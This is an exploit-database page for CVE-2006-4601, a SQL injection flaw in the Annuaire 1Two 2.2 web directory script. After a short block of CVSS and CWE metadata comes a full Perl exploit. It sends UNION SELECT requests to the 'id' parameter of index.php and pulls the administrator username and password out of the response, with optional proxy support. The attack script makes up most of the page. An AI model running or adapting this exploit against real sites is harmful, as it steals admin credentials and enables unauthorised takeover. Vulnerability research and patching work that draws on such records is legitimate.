Exploit: Annuaire 1Two 2.2 Remote SQL Injection Exploit ( Ascii Version )

Search:
WLB2

Annuaire 1Two 2.2 Remote SQL Injection Exploit

Published
Credit
Risk
2006.09.08
DarkFig
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2006-4601
No
Yes

Plain text version

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

#!/usr/bin/perl

#

# Affected.scr..: Annuaire 1Two 2.2

# Poc.ID........: 09060902.txt

# Type..........: SQL Injection (without quote)

# Risk.level....: Medium

# Vendor.Status.: Unpatched

# Src.download..: http://www.1two.org/

# Poc.link......: acid-root.new.fr/poc/09060902.txt

# Credits.......: DarkFig

#

#

use LWP::UserAgent;

use HTTP::Request;

use Getopt::Long;

use strict;

print STDOUT "n+", '-' x 53, "+n";

print STDOUT "| Annuaire 1Two 2.2 Remote SQL Injection Exploit |n";

print STDOUT '+', '-' x 53, "+n";

my($host,$path,$proxh,$proxu,$proxp,);

my $opt = GetOptions(

'host=s' => $host,

'path=s' => $path,

'proxh=s' => $proxh,

'proxu=s' => $proxu,

'proxp=s' => $proxp);

if(!$host) {

print STDOUT "| Usage: ./xx.pl --host=[www] --path=[/] [Options] |n";

print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |n";

print STDOUT '+', '-' x 53, "+n";

exit(0);

}

if(!$path) {$path = '/';}

if($host !~ /http/) {$host = 'http://'.$host;}

if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';}

my @fi = ('username', 'password');

my $ur = $host.$path.'index.php?id=';

my $ua = LWP::UserAgent->new();

$ua->agent('Mozilla XD');

$ua->timeout(30);

$ua->proxy(['http'] => $proxh) if $proxh;

foreach(@fi) {

my $xx = $_;

my $re = HTTP::Request->new(GET => $ur."-1 UNION SELECT $xx FROM 1two_annuaire_admin");

$re->proxy_authorization_basic($proxu, $proxp) if $proxp;

my $xd = $ua->request($re);

my $da = $xd->content;

if($da =~ /- (.*?)</title>/) {

if($xx eq 'username') {

print STDOUT " [+]User:";}

if($xx eq 'password') {

print STDOUT " [+]Passwd:";}

print STDOUT " $1n";

} else {

print STDOUT "[!]Exploit failedn";

}}

print STDOUT "+", '-' x 53, "+n";

exit(0);

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version